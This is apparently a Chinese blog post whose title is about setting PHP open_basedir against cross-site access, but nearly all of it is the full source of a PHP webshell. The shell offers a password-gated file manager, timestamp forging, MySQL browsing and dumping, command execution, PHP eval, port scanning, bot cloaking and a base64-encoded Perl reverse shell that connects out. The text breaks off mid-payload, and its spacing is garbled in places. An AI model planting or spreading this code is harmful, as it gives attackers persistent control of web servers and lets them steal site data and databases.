php open basedir设置防止跨站

最新推荐文章于 2024-07-20 18:20:55 发布

xuejinliang

最新推荐文章于 2024-07-20 18:20:55 发布

阅读量2.8k

点赞数

分类专栏： linux

本文链接：https://blog.csdn.net/xuejinliang/article/details/54847942

版权

linux 专栏收录该内容

92 篇文章 1 订阅

订阅专栏

通过在网站挂马，进入到PHP的目录，如果PHP打开了scandir方法的话，可以直接通过目录一级一级的像上面进入，此操作会造成很大的风险。

下面给出PHP的木马文件

<?php

//ini_set('display_errors',1);

@error_reporting(7);

@session_start();

@set_time_limit(0);

@set_magic_quotes_runtime(0);

if( strpos( strtolower($_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {

header('HTTP/1.0404 Not Found');

exit;

}

ob_start();

$mtime = explode(' ', microtime());

$starttime = $mtime[1] + $mtime[0];

define('SA_ROOT', str_replace('\\', '/',dirname(__FILE__)).'/');

define('SELF', $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);

define('IS_WIN', DIRECTORY_SEPARATOR =='\\');

define('IS_GPC', get_magic_quotes_gpc());

$dis_func =get_cfg_var('disable_functions');

define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ? 1 : 0 );

if( IS_GPC ) {

$_POST= s_array($_POST);

}

$P = $_POST;

unset($_POST);

/*===================== 程序配置 =====================*/

$pass = 'e10adc3949ba59abbe56e057f20f883e'; //对应的密码是123456

//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认

// cookie 前缀

$cookiepre = '';

// cookie 作用域

$cookiedomain = '';

// cookie 作用路径

$cookiepath = '/';

// cookie 有效期

$cookielife = 86400;

/*===================== 配置结束 =====================*/

$charsetdb = array(

'big5' => 'big5',

'cp-866' => 'cp866',

'euc-jp' => 'ujis',

'euc-kr' => 'euckr',

'gbk' => 'gbk',

'iso-8859-1' => 'latin1',

'koi8-r' => 'koi8r',

'koi8-u' => 'koi8u',

'utf-8' => 'utf8',

'windows-1252' => 'latin1',

);

$act = isset($P['act']) ? $P['act'] : '';

$charset = isset($P['charset']) ? $P['charset']: 'gbk';

$doing = isset($P['doing']) ? $P['doing'] :'';

for ($i=1;$i<=4;$i++) {

${'p'.$i}= isset($P['p'.$i]) ? $P['p'.$i] : '';

}

if (isset($charsetdb[$charset])) {

header("content-Type:text/html; charset=".$charset);

}

$timestamp = time();

/* 身份验证 */

if ($act == "Logout") {

scookie('loginpass','', -86400 * 365);

@header('Location:'.SELF);

exit;

}

if($pass) {

if($act == 'login') {

if($pass == encode_pass($P['password'])) {

scookie('loginpass',encode_pass($P['password']));

@header('Location:'.SELF);

exit;

}

if(isset($_COOKIE['loginpass'])) {

if($_COOKIE['loginpass'] != $pass) {

loginpage();

}

}else {

loginpage();

}

/* 验证结束 */

$errmsg = '';

$uchar = '▲';

$dchar = '▼';

!$act && $act = 'file';

$home_cwd = getcwd();

if (isset($P['cwd']) && $P['cwd']){

chdir($P['cwd']);

} else {

chdir(SA_ROOT);

}

$cwd = getcwd();

$web_cwd = $_SERVER['DOCUMENT_ROOT'];

foreach (array('web_cwd','cwd','home_cwd')as $k) {

if(IS_WIN) {

$$k= str_replace('\\', '/', $$k);

}

if(substr($$k, -1) != '/') {

$$k= $$k.'/';

}

// 查看PHPINFO

if ($act == 'phpinfo') {

if(IS_PHPINFO) {

phpinfo();

exit;

}else {

$errmsg= 'phpinfo() function has disabled';

}

if(!function_exists('scandir')) {

functionscandir($cwd) {

$files= array();

$dh= opendir($cwd);

while($file = readdir($dh)) {

$files[]= $file;

}

return$files ? $files : 0;

}

if ($act == 'down') {

if(is_file($p1) && is_readable($p1)) {

@ob_end_clean();

$fileinfo= pathinfo($p1);

if(function_exists('mime_content_type')) {

$type= @mime_content_type($p1);

header("Content-Type:".$type);

}else {

header('Content-type:application/x-'.$fileinfo['extension']);

}

header('Content-Disposition:attachment; filename='.$fileinfo['basename']);

header('Content-Length:'.sprintf("%u", @filesize($p1)));

@readfile($p1);

exit;

}else {

$errmsg= 'Can\'t read file';

$act= 'file';

}

<html>

<head>

<metahttp-equiv="Content-Type" content="text/html; charset=<?phpecho $charset;?>">

body,td{font: 12pxArial,Tahoma;line-height: 16px;}

.input, select{font:12pxArial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}

.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}

.red{color:#f00;}

.black{color:#000;}

.green{color:#090;}

.b{font-weight:bold;}

.bt{border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}

a {color: #00f;text-decoration:none;}

a:hover{color:#f00;text-decoration:underline;}

.alt1 td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}

.alt2 td{border-top:1px solid #fff;border-bottom:1pxsolid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}

.focus td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}

.head td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px5px;font-weight:bold;}

.head td span{font-weight:normal;}

.infolist {padding:10px;margin:10px 0 20px0;background:#F1F1F1;border:1px solid #ddd;}

form{margin:0;padding:0;}

h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

ul.infoli{margin:0;color:#444;line-height:24px;height:24px;}

u{text-decoration:none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

.drives{padding:5px;}

.drives span {margin:auto 7px;}

</style>

<scripttype="text/javascript">

function checkall(form) {

for(vari=0;i<form.elements.length;i++) {

vare = form.elements[i];

if (e.type == 'checkbox') {

if(e.name != 'chkall' && e.name != 'saveasfile')

e.checked= form.chkall.checked;

}

function $(id) {

returndocument.getElementById(id);

}

function createdir(){

varnewdirname;

newdirname= prompt('请输入目录名:', '');

if(!newdirname) return;

g(null,null,'createdir',newdirname);

}

function fileperm(pfile, val){

varnewperm;

newperm= prompt('当前目录/文件:'+pfile+'\n请输入新的权限:', val);

if(!newperm) return;

g(null,null,'fileperm',pfile,newperm);

}

function rename(oldname){

varnewfilename;

newfilename= prompt('文件名:'+oldname+'\n请输入新的文件名:', '');

if(!newfilename) return;

g(null,null,'rename',newfilename,oldname);

}

function createfile(){

varfilename;

filename= prompt('请输入文件的名字:', '');

if(!filename) return;

g('editfile',null, null, filename);

}

function setdb(dbname) {

if(!dbname)return;

$('dbform').tablename.value='';

$('dbform').doing.value='';

if($('dbform').sql_query)

{

$('dbform').sql_query.value='';

}

$('dbform').submit();

}

function setsort(k) {

$('dbform').order.value=k;

$('dbform').submit();

}

function settable(tablename,doing) {

if(!tablename)return;

if(doing) {

$('dbform').doing.value=doing;

}else {

$('dbform').doing.value='';

}

$('dbform').sql_query.value='';

$('dbform').tablename.value=tablename;

$('dbform').submit();

}

function s(act,cwd,p1,p2,p3,p4,charset) {

if(act!= null) $('opform').act.value=act;

if(cwd!= null) $('opform').cwd.value=cwd;

if(p1!= null) $('opform').p1.value=p1;

if(p2!= null) $('opform').p2.value=p2;

if(p3!= null) $('opform').p3.value=p3;

if(p4!= null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}

if(charset!= null) $('opform').charset.value=charset;

}

function g(act,cwd,p1,p2,p3,p4,charset) {

s(act,cwd,p1,p2,p3,p4,charset);

$('opform').submit();

}

</script>

</head>

<bodystyle="margin:0;table-layout:fixed; word-break:break-all">

<?php

formhead(array('name'=>'opform'));

makehide('act', $act);

makehide('cwd', $cwd);

makehide('p1', $p1);

makehide('p2', $p2);

makehide('p3', $p3);

makehide('p4', $p4);

makehide('charset', $charset);

formfoot();

if(!function_exists('posix_getegid')) {

$user= @get_current_user();

$uid= @getmyuid();

$gid= @getmygid();

$group= "?";

} else {

$uid= @posix_getpwuid(@posix_geteuid());

$gid= @posix_getgrgid(@posix_getegid());

$uid= $uid['uid'];

$user= $uid['name'];

$gid= $gid['gid'];

$group= $gid['name'];

}

<trclass="head">

</tr>

<trclass="alt1">

<td>

<spanstyle="float:right;">编码:

<?php

makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));

</span>

<ahref="javascript:g('logout');">注销</a>|

<ahref="javascript:g('file',null,'','','','','<?php echo$charset;?>');">文件管理器</a> |

<ahref="javascript:g('mysqladmin',null,'','','','','<?php echo$charset;?>');">MYSQL管理</a> |

<ahref="javascript:g('shell',null,'','','','','<?php echo$charset;?>');">执行命令</a> |

<ahref="javascript:g('phpenv',null,'','','','','<?php echo$charset;?>');">PHP变量</a> |

<ahref="javascript:g('portscan',null,'','','','','<?php echo$charset;?>');">端口扫描</a> |

<ahref="javascript:g('secinfo',null,'','','','','<?php echo$charset;?>');">安全信息</a> |

<ahref="javascript:g('eval',null,'','','','','<?php echo$charset;?>');">Eval PHP代码</a>

<?phpif (!IS_WIN) {?> | <a href="javascript:g('backconnect',null,'','','','','<?phpecho $charset;?>');">Back Connect</a><?php }?>

</td>

</tr>

</table>

<?php

$errmsg && m($errmsg);

if ($act == 'file') {

//判断当前目录可写情况

$dir_writeable= @is_writable($cwd) ? 'Writable' : 'Non-writable';

if(isset($p1)) {

switch($p1){

case'createdir':

//创建目录

if($p2) {

m('Directorycreated '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));

}

break;

case'uploadFile':

//上传文件

m('Fileupload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'],$cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));

break;

case'fileperm':

//编辑文件属性

if($p2 && $p3) {

$p3= base_convert($p3, 8, 10);

m('Setfile permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));

}

break;

case'rename':

//改名

if($p2 && $p3) {

m($p3.'renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));

}

break;

case'clonetime':

//克隆时间

if($p2 && $p3) {

$time= @filemtime($p3);

m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));

}

break;

case'settime':

//自定义时间

if($p2 && $p3) {

$time= strtotime($p3);

m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));

}

break;

case'delete':

//批量删除文件

if($P['dl']) {

$succ= $fail = 0;

foreach($P['dl'] as $f) {

if(is_dir($cwd.$f)) {

if(@deltree($cwd.$f)) {

$succ++;

}else {

$fail++;

}

}else {

if(@unlink($cwd.$f)) {

$succ++;

}else {

$fail++;

}

m('Deletedfolder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.',fail '.$fail);

}else {

m('Pleaseselect folder/file(s)');

}

break;

case'paste':

if($_SESSION['do']== 'copy') {

foreach($_SESSION['dl']as $f) {

copy_paste($_SESSION['c'],$f,$cwd);

}

}elseif($_SESSION['do'] == 'move') {

foreach($_SESSION['dl']as $f) {

@rename($_SESSION['c'].$f,$cwd.$f);

}

unset($_SESSION['do'],$_SESSION['dl'], $_SESSION['c']);

break;

default:

if($p1== 'copy' || $p1 == 'move') {

if(isset($P['dl']) && count($P['dl'])) {

$_SESSION['do']= $p1;

$_SESSION['dl']= $P['dl'];

$_SESSION['c']= $P['cwd'];

m('Havebeen copied to the session');

}else {

m('Pleaseselect folder/file(s)');

}

break;

}

echo"<scripttype=\"text/javascript\">$('opform').p1.value='';$('opform').p2.value='';</script>";

}

//操作完毕

$free= @disk_free_space($cwd);

!$free&& $free = 0;

$all= @disk_total_space($cwd);

!$all&& $all = 0;

$used= $all-$free;

p('<h2>文件管理器——当前的磁盘空间 '.sizecount($free).' of'.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');

$cwd_links= '';

$path= explode('/', $cwd);

$n=count($path);

for($i=0;$i<$n-1;$i++){

$cwd_links.= '<a href="javascript:g(\'file\', \'';

for($j=0;$j<=$i;$j++){

$cwd_links.= $path[$j].'/';

}

$cwd_links.= '\');">'.$path[$i].'/</a>';

}

<scripttype="text/javascript">

document.onclick = shownav;

function shownav(e){

varsrc = e?e.target:event.srcElement;

do{

if(src.id=="jumpto") {

$('inputnav').style.display= "";

$('pathnav').style.display= "none";

return;

}

if(src.id=="inputnav") {

return;

}

src= src.parentNode;

}while(src.parentNode)

$('inputnav').style.display= "none";

$('pathnav').style.display= "";

}

</script>

<formοnsubmit="g('file',this.cwd.value);return false;"method="POST" id="godir" name="godir">

<tableid="pathnav" width="100%" border="0"cellpadding="5" cellspacing="0">

<tr>

<tdwidth="100%"><?php echo $cwd_links.' - '.getChmod($cwd).' /'.PermsColor($cwd).getUser($cwd);?> (<?php echo$dir_writeable;?>)</td>

</tr>

</table>

<tableid="inputnav" width="100%" border="0"cellpadding="5" cellspacing="0"style="display:none;">

<tr>

<tdwidth="100%"><input class="input"name="cwd" value="<?php echo $cwd;?>"type="text" style="width:99%;margin:0 8px;"></td>

</tr>

</table>

</form>

<?php

if(IS_WIN) {

$comma= '';

p('<divclass="drives">');

foreach(range('A','Z') as $drive ) {

if(is_dir($drive.':/')) {

p($comma.'<ahref="javascript:g(\'file\',\''.$drive.':/\');">'.$drive.':\</a>');

$comma= '<span>|</span>';

}

p('</div>');

}

</div>

<?php

p('<tablewidth="100%" border="0" cellpadding="4"cellspacing="0">');

p('<trclass="alt1"><td colspan="6"style="padding:5px;line-height:20px;">');

p('<formaction="'.SELF.'" method="POST"enctype="multipart/form-data"><divstyle="float:right;"><input name="uploadfile"value="" type="file" /> <input class="bt"value="上传" type="submit"/><input name="charset" value="'.$charset.'"type="hidden" /><input type="hidden"name="p1" value="uploadFile"><inputname="cwd" value="'.$cwd.'" type="hidden"/></div></form>');

p('<ahref="javascript:g(\'file\',\''.str_replace('\\','/',$web_cwd).'\');">根目录</a>');

p('| <a href="javascript:g(\'file\', \''.$home_cwd.'\');">程序目录</a>');

p('| <ahref="javascript:g(\'file\',\''.$cwd.'\',null,null,null,\'dir\');">可写目录</a> ');

p('| <a href="javascript:createdir();">新建目录</a> | <a href="javascript:createfile();">新建文件</a>');

p('</td></tr>');

$sort= array('filename', 1);

if($p1){

if(preg_match('!s_([A-z_]+)_(\d{1})!',$p1, $match)) {

$sort= array($match[1], (int)$match[2]);

}

formhead(array('name'=>'flist'));

makehide('act','file');

makehide('p1','');

makehide('cwd',$cwd);

makehide('charset',$charset);

p('<trclass="head">');

p('<tdwidth="2%" nowrap><input name="chkall"value="on" type="checkbox"οnclick="checkall(this.form)" /></td>');

p('<td><ahref="javascript:g(\'file\',null,\'s_filename_'.($sort[1]?0:1).'\');">文件名</a> '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1'|| !$p1 ? $uchar : '').'</td>');

p('<tdwidth="16%"><ahref="javascript:g(\'file\',null,\'s_mtime_'.($sort[1]?0:1).'\');">修改时间</a> '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1'? $uchar : '').'</td>');

p('<tdwidth="10%"><a href="javascript:g(\'file\',null,\'s_size_'.($sort[1]?0:1).'\');">大小</a> '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ?$uchar : '').'</td>');

p('<tdwidth="20%">权限 / 修改</td>');

p('<tdwidth="22%">操作</td>');

p('</tr>');

//查看所有可写文件和目录

$dirdata=$filedata=array();

if($p4 == 'dir') {

$dirdata= GetWDirList($cwd);

$filedata= array();

}else {

//默认目录列表

$dirs= @scandir($cwd);

if($dirs) {

$dirs= array_diff($dirs, array('.'));

foreach($dirs as $file) {

$filepath=$cwd.$file;

if(@is_dir($filepath)){

$dirdb['filename']=$file;

$dirdb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));

$dirdb['chmod']=getChmod($filepath);

$dirdb['perm']=PermsColor($filepath);

$dirdb['owner']=getUser($filepath);

$dirdb['link']=$filepath;

if($file=='..') {

$dirdata['up']=1;

}else {

$dirdata[]=$dirdb;

}

}else {

$filedb['filename']=$file;

//$filedb['size']=@filesize($filepath);

$filedb['size']=sprintf("%u",@filesize($filepath));

$filedb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));

$filedb['chmod']=getChmod($filepath);

$filedb['perm']=PermsColor($filepath);

$filedb['owner']=getUser($filepath);

$filedb['link']=$filepath;

$filedata[]=$filedb;

}

unset($dirdb);

unset($filedb);

}

$dir_i= '0';

if(isset($dirdata['up'])) {

$thisbg= bg();

p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

p('<tdalign="center">-</td><td nowrapcolspan="5"><ahref="javascript:g(\'file\',\''.getUpPath($cwd).'\');">ParentDirectory</a></td>');

p('</tr>');

}

unset($dirdata['up']);

usort($dirdata,'cmp');

usort($filedata,'cmp');

foreach($dirdataas $key => $dirdb){

if($p1== 'getsize' && $p2 == $dirdb['filename']) {

$attachsize= dirsize($p2);

$attachsize= is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';

}else {

$attachsize= '<a href="javascript:g(\'file\', null, \'getsize\',\''.$dirdb['filename'].'\');">查看大小</a>';

}

$thisbg= bg();

p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

p('<tdwidth="2%" nowrap><input name="dl[]"type="checkbox"value="'.$dirdb['filename'].'"></td>');

p('<td><ahref="javascript:g(\'file\',\''.$dirdb['link'].'\')">'.$dirdb['filename'].'</a></td>');

p('<tdnowrap><ahref="javascript:g(\'newtime\',null,\''.$dirdb['filename'].'\');">'.$dirdb['mtime'].'</a></td>');

p('<tdnowrap>'.$attachsize.'</td>');

p('<tdnowrap>');

p('<ahref="javascript:fileperm(\''.$dirdb['filename'].'\',\''.$dirdb['chmod'].'\');">'.$dirdb['chmod'].'</a> / ');

p('<ahref="javascript:fileperm(\''.$dirdb['filename'].'\',\''.$dirdb['chmod'].'\');">'.$dirdb['perm'].'</a>'.$dirdb['owner'].'</td>');

p('<tdnowrap><ahref="javascript:rename(\''.$dirdb['filename'].'\');">重命名</a></td>');

p('</tr>');

$dir_i++;

}

p('<trbgcolor="#dddddd" stlye="border-top:1px solid#fff;border-bottom:1px solid #ddd;"><td colspan="6"height="5"></td></tr>');

$file_i= '0';

foreach($filedataas $key => $filedb){

$fileurl= '/'.str_replace($web_cwd,'',$filedb['link']);

$thisbg= bg();

p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

p('<tdwidth="2%" nowrap><input name="dl[]"type="checkbox"value="'.$filedb['filename'].'"></td>');

p('<td>'.((strpos($filedb['link'],$web_cwd) !== false) ? '<a href="'.$fileurl.'"target="_blank">'.$filedb['filename'].'</a>' :$filedb['filename']).'</td>');

p('<tdnowrap><ahref="javascript:g(\'newtime\',null,\''.$filedb['filename'].'\');">'.$filedb['mtime'].'</a></td>');

p('<tdnowrap>'.sizecount($filedb['size']).'</td>');

p('<tdnowrap>');

p('<ahref="javascript:fileperm(\''.$filedb['filename'].'\',\''.$filedb['chmod'].'\');">'.$filedb['chmod'].'</a> / ');

p('<ahref="javascript:fileperm(\''.$filedb['filename'].'\',\''.$filedb['chmod'].'\');">'.$filedb['perm'].'</a>'.$filedb['owner'].'</td>');

p('<tdnowrap>');

p('<ahref="javascript:g(\'down\',null,\''.$filedb['filename'].'\');">下载</a> | ');

p('<ahref="javascript:g(\'editfile\',null,null,\''.$filedb['filename'].'\');">编辑</a> | ');

p('<ahref="javascript:rename(\''.$filedb['filename'].'\');">重命名</a>');

p('</td></tr>');

$file_i++;

}

p('<trclass="'.bg().' head"><td colspan="5"><ahref="#"οnclick="$(\'flist\').p1.value=\'delete\';$(\'flist\').submit();">删除</a> | <a href="#"οnclick="$(\'flist\').p1.value=\'copy\';$(\'flist\').submit();">复制</a> | <a href="#"οnclick="$(\'flist\').p1.value=\'move\';$(\'flist\').submit();">移动</a>'.(isset($_SESSION['do']) &&@count($_SESSION['dl']) ? ' | <a href="#"οnclick="$(\'flist\').p1.value=\'paste\';$(\'flist\').submit();">Paste</a>': '').'</td><td align="right">'.$dir_i.' 目录 / '.$file_i.' 文件</td></tr>');

p('</form></table>');

}// end dir

elseif ($act == 'mysqladmin') {

$order= isset($P['order']) ? $P['order'] : '';

$dbhost= isset($P['dbhost']) ? $P['dbhost'] : '';

$dbuser= isset($P['dbuser']) ? $P['dbuser'] : '';

$dbpass= isset($P['dbpass']) ? $P['dbpass'] : '';

$dbname= isset($P['dbname']) ? $P['dbname'] : '';

$tablename= isset($P['tablename']) ? $P['tablename'] : '';

if($doing == 'dump') {

if(isset($P['bak_table']) && $P['bak_table']) {

$DB= new DB_MySQL;

$DB->charsetdb= $charsetdb;

$DB->charset= $charset;

$DB->connect($dbhost,$dbuser, $dbpass, $dbname);

if($P['saveasfile'] && $P['bak_path']) {

$fp= @fopen($P['bak_path'],'w');

if($fp) {

foreach($P['bak_table']as $k => $v) {

if($v) {

$DB->sqldump($v,$fp);

}

fclose($fp);

$fileurl= str_replace(SA_ROOT,'',$P['bak_path']);

m('Databasehas backup to <a href="'.$fileurl.'"target="_blank">'.$P['bak_path'].'</a>');

}else {

m('Backupfailed');

}

}else {

@ob_end_clean();

$filename= basename($dbname.'.sql');

header('Content-type:application/unknown');

header('Content-Disposition:attachment; filename='.$filename);

foreach($P['bak_table']as $k => $v) {

if($v) {

$DB->sqldump($v);

}

exit;

}

$DB->close();

}else {

m('Pleasechoose the table');

}

$doing= '';

}

formhead(array('title'=>'MYSQL管理', 'name'=>'dbform'));

makehide('act','mysqladmin');

makehide('doing',$doing);

makehide('charset',$charset);

makehide('tablename',$tablename);

makehide('order',$order);

p('<p>');

p('地址:');

makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));

p('用户:');

makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));

p('密码:');

makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));

makeinput(array('value'=>'连接','type'=>'submit','class'=>'bt'));

p('</p>');

if($dbhost && $dbuser && isset($dbpass)) {

//初始化数据库类

$DB= new DB_MySQL;

$DB->charsetdb= $charsetdb;

$DB->charset= $charset;

$DB->connect($dbhost,$dbuser, $dbpass, $dbname);

//获取数据库信息

p('<pclass="red">MySQL '.$DB->version().' running in '.$dbhost.' as'.$dbuser.'@'.$dbhost.'</p>');

$highver= $DB->version() > '4.1' ? 1 : 0;

//获取数据库

$query= $DB->query("SHOW DATABASES");

$dbs= array();

$dbs[]= '-- Select a database --';

while($db= $DB->fetch($query)) {

$dbs[$db['Database']]= $db['Database'];

}

makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));

if($dbname) {

p('<p>Currentdababase: <ahref="javascript:setdb(\''.$dbname.'\');">'.$dbname.'</a>');

if($tablename) {

p('| Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a>[ <a href="javascript:settable(\''.$tablename.'\',\'structure\');">Structure</a> ]');

}

p('</p>');

$sql_query= isset($P['sql_query']) ? $P['sql_query'] : '';

if($tablename && !$sql_query) {

$sql_query= "SELECT * FROM $tablename LIMIT 0, 30";

}

if($tablename && $doing == 'structure') {

$sql_query= "SHOW FULL COLUMNS FROM $tablename;\n";

$sql_query.= "SHOW INDEX FROM $tablename;";

}

p('<p><tablewidth="200" border="0" cellpadding="0"cellspacing="0"><tr><td colspan="2">Run SQLquery/queries on database'.$dbname.':</td></tr><tr><td><textareaname="sql_query" class="area"style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><tdstyle="padding:0 5px;"><input class="bt"οnclick="$(\'doing\').value=\'\'" style="height:50px;"type="submit" value="Query"/></td></tr></table></p>');

if($sql_query) {

$querys= @explode(';',$sql_query);

foreach($querysas $num=>$query) {

if($query) {

p("<pclass=\"red b\">Query#{$num} :".htmlspecialchars($query,ENT_QUOTES)."</p>");

switch($DB->query_res($query))

{

case0:

p('<h2>'.$DB->halt('Error').'</h2>');

break;

case1:

$result= $DB->query($query);

$tatol= $DB->num_rows($result);

p('<tableborder="0" cellpadding="3" cellspacing="0">');

p('<trclass="head">');

$fieldnum= @mysql_num_fields($result);

for($i=0;$i<$fieldnum;$i++){

p('<tdnowrap>'.@mysql_field_name($result, $i).'</td>');

}

p('</tr>');

if(!$tatol) {

p('<trclass="alt2" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\'alt2\';"><td nowrapcolspan="'.$fieldnum.'" class="red b">Norecords</td></tr>');

}else {

while($mn= $DB->fetch($result)){

$thisbg= bg();

p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

//读取记录用

foreach($mnas $key=>$inside){

p('<tdnowrap>'.(($inside == null) ? '<i>null</i>' :html_clean($inside)).'</td>');

}

p('</tr>');

unset($b1);

}

p('</table>');

break;

case2:

p('<h2>AffectedRows : '.$DB->affected_rows().'</h2>');

break;

}

}else {

$query= $DB->query("SHOW TABLE STATUS");

$table_num= $table_rows = $data_size = 0;

$tabledb= array();

while($table= $DB->fetch($query)) {

$data_size= $data_size + $table['Data_length'];

$table_rows= $table_rows + $table['Rows'];

$table_num++;

$tabledb[]= $table;

}

$data_size= sizecount($data_size);

unset($table);

if(count($tabledb)) {

if($highver) {

$db_engine= $DB->fetch($DB->query("SHOW VARIABLES LIKE'storage_engine';"));

$db_collation= $DB->fetch($DB->query("SHOW VARIABLES LIKE'collation_database';"));

}

$sort= array('Name', 1);

if($order){

if(preg_match('!s_([A-z_]+)_(\d{1})!',$order, $match)) {

$sort= array($match[1], (int)$match[2]);

}

usort($tabledb,'cmp');

p('<tableborder="0" cellpadding="0" cellspacing="0"id="lists">');

p('<trclass="head">');

p('<tdwidth="2%"><input name="chkall" value="on"type="checkbox" οnclick="checkall(this.form)"/></td>');

p('<td><ahref="javascript:setsort(\'s_Name_'.($sort[1]?0:1).'\');">Name</a>'.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ?$uchar : '').'</td>');

p('<td><ahref="javascript:setsort(\'s_Rows_'.($sort[1]?0:1).'\');">Rows</a>'.($order== 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar :'').'</td>');

p('<td><ahref="javascript:setsort(\'s_Data_length_'.($sort[1]?0:1).'\');">Data_length</a>'.($order== 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar :'').'</td>');

p('<td><ahref="javascript:setsort(\'s_Create_time_'.($sort[1]?0:1).'\');">Create_time</a>'.($order== 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar :'').'</td>');

p('<td><ahref="javascript:setsort(\'s_Update_time_'.($sort[1]?0:1).'\');">Update_time</a>'.($order== 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar :'').'</td>');

if($highver) {

p('<td>Engine</td>');

p('<td>Collation</td>');

}

p('<td>Other</td>');

p('</tr>');

foreach($tabledb as $key => $table) {

$thisbg= bg();

p('<trclass="'.$thisbg.'" οnmοuseοver="this.className=\'focus\';"οnmοuseοut="this.className=\''.$thisbg.'\';">');

p('<tdalign="center" width="2%"><inputtype="checkbox" name="bak_table[]"value="'.$table['Name'].'" /></td>');

p('<td><ahref="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');

p('<td>'.$table['Rows'].' </td>');

p('<td>'.sizecount($table['Data_length']).'</td>');

p('<td>'.$table['Create_time'].' </td>');

p('<td>'.$table['Update_time'].' </td>');

if($highver) {

p('<td>'.$table['Engine'].'</td>');

p('<td>'.$table['Collation'].'</td>');

}

p('<td><ahref="javascript:settable(\''.$table['Name'].'\',\'structure\');">Structure</a></td>');

p('</tr>');

}

p('<trclass="head">');

p('<tdwidth="2%"> </td>');

p('<td>'.$table_num.'table(s)</td>');

p('<td>'.$table_rows.'</td>');

p('<td>'.$data_size.'</td>');

p('<td> </td>');

if($highver) {

p('<td>'.$db_engine['Value'].'</td>');

p('<td>'.$db_collation['Value'].'</td>');

}

p('<td> </td>');

p('</tr>');

p("<trclass=\"".bg()."\"><tdcolspan=\"".($highver ? 9 : 7)."\"><inputname=\"saveasfile\" value=\"1\" type=\"checkbox\"/> Save as file <input class=\"input\"name=\"bak_path\" value=\"".SA_ROOT.$dbname.".sql\"type=\"text\" size=\"60\" /> <inputclass=\"bt\" type=\"button\" value=\"Export selectiontable\"οnclick=\"$('doing').value='dump';$('dbform').submit();\"/></td></tr>");

p("</table>");

}else {

p('<pclass="red b">No tables</p>');

}

$DB->free_result($query);

}

$DB->close();

}

formfoot();

}//end mysql

elseif ($act == 'backconnect') {

!$p2&& $p2 = $_SERVER['REMOTE_ADDR'];

!$p3&& $p3 = '12345';

$usedb= array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

